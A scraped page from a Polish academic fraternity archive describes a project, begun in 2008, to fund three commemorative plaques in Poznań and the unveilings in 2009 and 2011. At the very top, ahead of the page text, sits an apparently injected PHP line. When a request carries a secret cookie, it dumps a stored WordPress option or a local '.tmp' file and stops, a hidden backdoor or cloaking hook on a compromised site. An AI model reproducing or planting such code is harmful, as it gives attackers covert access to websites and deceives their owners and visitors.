if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Tablice pamiątkowe

W końcu 2007 r. Archiwum Korporacyjne wystąpiło z projektem ufundowania trzech tablic pamiątkowych upamiętniających zasłużonym dla niepodległości państwa oraz rozwoju polskiej nauki członków korporacji akademickich.

Tablice korporacyjne, krużganki klasztoru oo. Dominikanów, Poznań 1984 r.

Inicjatywę tę podjęło Stowarzyszenie Filistrów Korporacji Akademickich. Po uzyskaniu wsparcia korporacji zrzeszonych w Poznańskim Kole Międzykorporacyjnym w lutym 2008 r. zainicjowało ono prace, których celem jest odsłonięcie w latach 2008-2014 trzech tablic poświęconych:

  • korporantom-powstańcom wielkopolskim,
  • korporantom-rektorom Uniwersytetu Poznańskiego oraz
  • korporantom poległym, pomordowanym i zaginionym w latach 1939-1956.

Okazją do podjęcia tych działań jest z jednej strony 25-ta rocznica odsłonięcia w latach 1983-1984 trzech tablic korporacyjnych w krużgankach klasztoru oo. Dominikanów w Poznaniu, a z drugiej strony przypadające w najbliższym czasie okrągłe rocznice: wybuchu Powstania Wielkopolskiego (2008 r., 90-ta rocznica), powstania pierwszych korporacji poznańskich (2010-2011, także 90-ta rocznica) oraz wybuchu II wojny światowej (2014 r., 75-ta rocznica).

Pierwszą z tablic poświęconą korporantom-powstańcom wielkopolskim odsłonięto dnia 25 I 2009 r. na fasadzie Księgarni Św. Wojciecha przy Placu Wielkopolskim w Poznaniu (vide Aktualności 2009).

Odsłonięcie tablicy przez Zygfryda Kordusa z Magna-Polonii i Jakuba Pokorę z Masovii.Tablica powstańcza, Poznań 2009 r.Przemówienie Bartłomieja Wróblewskiego z K! Lechia.

Druga z tablic w hołdzie rektorom Uniwersytetu Poznańskiego-członkom korporacji akademickich została odsłonięta dnia 4 VI 2011 r. w budynku Collegium Minus Uniwerstyetu im. Adama Mickiewicza w Poznaniu (vide Aktualności).

Odsłonięcie tablicy przez prof. Lecha Działoszyńskiego z K! Masovia i rektora UAM prof. Bronisława Marciniaka.Tablica rektorska, Poznań 2011 r.Pamiątkowa fotografia.

W związku z przygotowaniami do podjęcia prac nad trzecią z tablic poszukujemy wiadomości o wszystkich poległych, pomordowanych i zaginionych w latach 1939-1956 członkach korporacji akademickich (vide Kontakt).

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 VII 2008 r.
Ostatnia zmiana: 16 VI 2011 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }